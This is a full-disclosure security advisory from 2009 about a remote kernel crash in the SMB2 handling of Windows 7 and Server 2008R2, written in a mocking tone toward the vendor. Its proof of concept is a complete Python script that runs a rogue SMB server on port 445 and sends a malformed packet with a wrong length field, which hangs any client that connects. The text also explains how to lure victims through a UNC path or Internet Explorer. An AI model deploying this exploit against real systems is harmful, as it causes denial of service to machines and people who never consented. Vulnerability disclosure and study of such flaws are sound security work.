This bug is a real proof that SDL #FAIL The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed... Can be trigered outside the lan via (IE*) The bug is so noob, it should have been spotted 2 years ago by the SDL if the SDL would have ever existed: netbios_header = struct.pack(">i", len(''.join(SMB_packet))+SMB_packet (The netbios header provide the length of the incoming smb{1,2} packet) If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow ! WHAT ?? you gotta be kidding me where's my SDL ?!? "Most secure Os ever"; What ever your firewall is set to, you can get remotly smashed via IE or even via some broadcasting nbns tricks (no user interaction) How funny. Advisory: ============================================= - Release date: November 11th, 2009 - Discovered by: Laurent Gaffi - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- Windows 7 * , Server 2008R2 Remote Kernel Crash II. BACKGROUND ------------------------- #FAIL,#FAIL,#FAIL SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn. #FAIL,#FAIL,#FAIL III. DESCRIPTION ------------------------- See : http://g-laurent.blogspot.com/ for much more details #Comment: This bug is specific Windows 7/2008R2. IV. PROOF OF CONCEPT ------------------------- #win7-crash.py: #Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop) #Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop. #NO BSOD, YOU GOTTA PULL THE PLUG. #To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash #Author: Laurent Gaffi # import SocketServer packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a.. "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41" "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00" "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01" "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20" "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e" "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a" class SMB2(SocketServer.BaseRequestHandler): def handle(self): print "Who:", self.client_address print "THANKS SDL" input = self.request.recv(1024) self.request.send(packet) self.request.close() launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445 launch.serve_forever() V. BUSINESS IMPACT ------------------------- An attacker can remotly crash any Windows 7/Server 2008R2 on a LAN or via IE VI. SYSTEMS AFFECTED ------------------------- Windows 7, Windowns Server 2008R2 VII. SOLUTION ------------------------- No patch available for the moment, your vendor do not care. Close SMB feature and ports, until a real audit is provided. VIII. REFERENCES ------------------------- http://blogs.msdn.com/sdl/ IX. CREDITS ------------------------- This vulnerability has been discovered by Laurent Gaffi Laurent.gaffie{remove-this}(at)gmail.com X. REVISION HISTORY ------------------------- November 8th, 2009: MSRC contacted November 8th, 2009: MSRC acknoledge the vuln November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin. November 11th, 2009: Win 7 remote kernel smash released XI. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. XII.Personal Notes ------------------------- More Remote Kernel FD @MS to come.